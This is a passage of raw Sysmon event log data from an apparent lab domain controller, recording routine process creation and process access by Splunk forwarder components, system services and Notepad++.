Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180101Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:37.886{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D45D-601A-4230-00000000A301}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000180100Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:37.886{29E67E80-D45D-601A-4230-00000000A301}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000180099Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:37.354{29E67E80-D45D-601A-4130-00000000A301}66124500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180098Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:37.214{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D45D-601A-4130-00000000A301}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180097Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:37.214{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180096Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:37.214{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180095Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:37.214{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180094Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:37.214{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180093Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:37.214{29E67E80-7CBD-6019-0500-00000000A301}640756C:\Windows\system32\csrss.exe{29E67E80-D45D-601A-4130-00000000A301}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180092Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:37.214{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D45D-601A-4130-00000000A301}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000180091Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:37.215{29E67E80-D45D-601A-4130-00000000A301}6612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000180116Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:38.557{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D45E-601A-4330-00000000A301}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180115Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:38.557{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180114Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:38.557{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180113Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:38.557{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180112Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:38.557{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180111Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:38.557{29E67E80-7CBD-6019-0500-00000000A301}6402192C:\Windows\system32\csrss.exe{29E67E80-D45E-601A-4330-00000000A301}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180110Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:38.557{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D45E-601A-4330-00000000A301}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000180109Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:38.558{29E67E80-D45E-601A-4330-00000000A301}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000180108Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:38.042{29E67E80-D45D-601A-4230-00000000A301}67242040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180139Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.448{29E67E80-84F7-6019-4105-00000000A301}36005720C:\Windows\Explorer.EXE{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180138Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.448{29E67E80-84F7-6019-4105-00000000A301}36005720C:\Windows\Explorer.EXE{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180137Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.448{29E67E80-84F7-6019-4105-00000000A301}36005720C:\Windows\Explorer.EXE{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180136Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.448{29E67E80-84F7-6019-4105-00000000A301}36006908C:\Windows\Explorer.EXE{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180135Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.448{29E67E80-84F7-6019-4105-00000000A301}36006908C:\Windows\Explorer.EXE{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180134Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.448{29E67E80-84F7-6019-4105-00000000A301}36006908C:\Windows\Explorer.EXE{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180133Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.448{29E67E80-84F7-6019-4105-00000000A301}36006908C:\Windows\Explorer.EXE{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180132Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.323{29E67E80-84F6-6019-3B05-00000000A301}31764480C:\Windows\system32\taskhostw.exe{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180131Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:39.323{29E67E80-84F6-6019-3B05-00000000A301}31764480C:\Windows\system32\taskhostw.exe{29E67E80-D45F-601A-4430-00000000A301}4356C:\Program 